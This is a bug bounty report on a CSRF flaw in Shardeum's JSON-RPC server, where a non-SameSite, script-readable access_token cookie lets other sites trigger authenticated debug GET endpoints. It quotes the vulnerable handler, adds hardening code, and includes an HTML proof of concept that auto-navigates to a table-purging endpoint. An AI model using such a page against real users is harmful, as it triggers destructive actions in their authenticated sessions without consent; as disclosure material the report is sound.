Boost | Shardeum: Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to missing SameSite=Strict attribute allowing an attacker to perform authenticated actions

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for Boost | Shardeum: Ancillaries

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: https://github.com/shardeum/json-rpc-server/tree/dev

Impacts:

  • CSRF vulnerability allowing an attacker to perform authenticated actions

  • Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

Description

Brief/Intro

The access_token cookie is set without the SameSite=Strict attribute, which leads to a CSRF vulnerability that allows an attacker to perform authenticated actions.

Vulnerability Details

In src/routes/authenticate.ts:

router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})

After authentication, the RPC server sets the access_token cookie without a SameSite=Strict restriction. The browser therefore attaches the cookie to requests initiated by other sites, which allows a malicious website to call the authenticated GET API endpoints that perform actions such as purging tables, modifying config values, node subscription, etc.
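Added example, not code from the json-rpc-server repository: the options the vulnerable handler passes to res.cookie() beside a hardened set, serialized the way the resulting Set-Cookie header reads, plus a hypothetical Fetch Metadata middleware as a second layer for debug routes that change state on GET. The names hardenedCookieOptions, serializeCookie and rejectCrossSite are assumptions for this example.

```javascript
// Added example (not the shardeum json-rpc-server project's own code).
// Helper names (hardenedCookieOptions, serializeCookie, rejectCrossSite) are
// hypothetical; the serializer mirrors what Express's res.cookie() emits.

// Options the vulnerable handler passes to res.cookie() (from the report).
const weakCookieOptions = { httpOnly: false, maxAge: 1000 * 60 * 60 * 700 };

// Hardened options for the same cookie. SameSite=Strict keeps the browser
// from attaching it to any request initiated by another site (a link click
// or a document.location navigation included); HttpOnly keeps it out of
// reach of page scripts; Secure stops it travelling over plain HTTP.
function hardenedCookieOptions() {
  return {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 1000 * 60 * 60 * 24 * 30, // 30 days
  };
}

// Build the Set-Cookie header value so the two option sets can be compared.
function serializeCookie(name, value, opts) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (opts.maxAge !== undefined) parts.push(`Max-Age=${Math.floor(opts.maxAge / 1000)}`);
  if (opts.httpOnly) parts.push('HttpOnly');
  if (opts.secure) parts.push('Secure');
  if (opts.sameSite) {
    const s = opts.sameSite;
    parts.push(`SameSite=${s[0].toUpperCase()}${s.slice(1).toLowerCase()}`);
  }
  return parts.join('; ');
}

// Second layer for debug routes that change state on GET: browsers send
// Sec-Fetch-Site with each request, and "cross-site" means another site
// initiated it. Older browsers omit the header, so its absence is let
// through and the cookie attribute stays the primary control.
// Express-style (req, res, next) signature.
function rejectCrossSite(req, res, next) {
  const site = String(req.headers['sec-fetch-site'] || '').toLowerCase();
  if (site === 'cross-site') {
    return res.status(403).send({ message: 'cross-site request rejected' });
  }
  return next();
}
```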

Impact Details

  • The vulnerability allows malicious websites to perform actions such as purging tables, modifying config values, node subscription, etc.

  • The vulnerability could result in deletion of debug data.

References

https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18

Proof of concept

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>csrf performing authenticated action</title>
</head>
<body>
  <h1> calling /log/cleanTxTable which will trigger purging of table that store transaction logging </h1>
  <a href="http://127.0.0.1:8888/log/cleanTxTable"> click here to attack </a>

  <script type="text/javascript">
    function callAutomatically() {
      document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically, 3000);
  </script>
</body>
</html>

Steps to Reproduce

  1. Authenticate to the RPC server with the passphrase.

  2. Save the PoC file as csrfpoc.html.

  3. Open csrfpoc.html in the browser you authenticated to the RPC server with.

  4. Either click "click here to attack" or wait 3 seconds for the request to be sent automatically.

  5. You will see the response {"success":true}.
